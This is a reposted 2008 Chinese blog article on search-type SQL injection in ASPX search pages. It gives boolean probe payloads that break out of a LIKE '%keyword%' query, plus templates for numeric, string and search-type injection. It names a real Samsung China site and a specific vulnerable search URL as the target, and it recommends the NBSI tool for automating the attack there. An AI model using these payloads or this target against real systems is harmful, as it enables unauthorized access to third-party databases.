当前位置: 代码网 > 服务器>网络安全>企业安全 > ASPX搜索型注入

ASPX搜索型注入

2008年10月08日 企业安全 我要评论
ASPX搜索型注入 樱木花盗's BLOG今天看到有个关于搜索型注入的文章,用到的是一种新技术,探测的是三星:http://notebook.samsung.com.cn/index.aspx 注入方式是: 一般网站... 08-10-08
樱木花盗's blog

今天看到有个关于搜索型注入的文章,用到的是一种新技术,探测的是三星:http://notebook.samsung.com.cn/index.aspx

注入方式是:

一般网站的搜索都是部分匹配的
有漏洞的url是http://notebook.samsung.com.cn/news/news.aspx& ... t&st=title&sc=
构造注入语句 三星%’and 1=1 and ’%’=’
三星%’and 1=2 and ’%’=’

大家看到了吧 两个返回页面是不一样的 说明有注入的漏洞 特征字 写 笔记本 就是三星%’and 1=1 and ’%’=’ 返回时有的


我们知道一般搜索代码是这么写的:

select * from 表名 where 字段 like ’%关键字%’

这样就造成了对关键字前后的所有匹配(%是用来全部匹配的)

这里如果关键字没有过滤的话,就可以这样来构造:

关键字=’ and [查询条件] and ‘%’=’

这样查询就变成

select * from 表名 where 字段 like ’%’ and 1=1 and ’%’=’%’

这样就很好的构成了一个sql注入点,当然用手工也可以,用nbsi也可以~~

注入是不分家的,没必要什么型什么型的!~

如果不信,大家请看下面的《sql注入天书》的原话

第一节、sql注入的一般步骤

首先,判断环境,寻找注入点,判断数据库类型,这在入门篇已经讲过了。

其次,根据注入参数类型,在脑海中重构sql语句的原貌,按参数类型主要分为下面三种:

(a) id=49 这类注入的参数是数字型,sql语句原貌大致如下:
select * from 表名 where 字段=49
注入的参数为id=49 and [查询条件],即是生成语句:
select * from 表名 where 字段=49 and [查询条件]


(b) class=连续剧 这类注入的参数是字符型,sql语句原貌大致概如下:
select * from 表名 where 字段=’连续剧’
注入的参数为class=连续剧’ and [查询条件] and ‘’=’ ,即是生成语句:
select * from 表名 where 字段=’连续剧’ and [查询条件] and ‘’=’’

(c) 搜索时没过滤参数的,如keyword=关键字,sql语句原貌大致如下:
select * from 表名 where 字段like ’%关键字%’
注入的参数为keyword=’ and [查询条件] and ‘%’=’, 即是生成语句:
select * from 表名 where字段like ’%’ and [查询条件] and ‘%’=’%’


当然手工是麻烦的

用工具的话,我建议用nbsi的工具比较好,就我感觉只有nbsi结合了这个技术,用别的软体是不能注入的

注入点只要写:

http://notebook.samsung.com.cn/news/news.aspx?& ... &st=title&sc=%

再加个特征字符就可以了
(0)

相关文章:

版权声明:本文内容由互联网用户贡献,该文观点仅代表作者本人。本站仅提供信息存储服务,不拥有所有权,不承担相关法律责任。 如发现本站有涉嫌抄袭侵权/违法违规的内容, 请发送邮件至 2386932994@qq.com 举报,一经查实将立刻删除。

发表评论

验证码:
Copyright © 2017-2025  代码网 保留所有权利. 粤ICP备2024248653号
站长QQ:2386932994 | 联系邮箱:2386932994@qq.com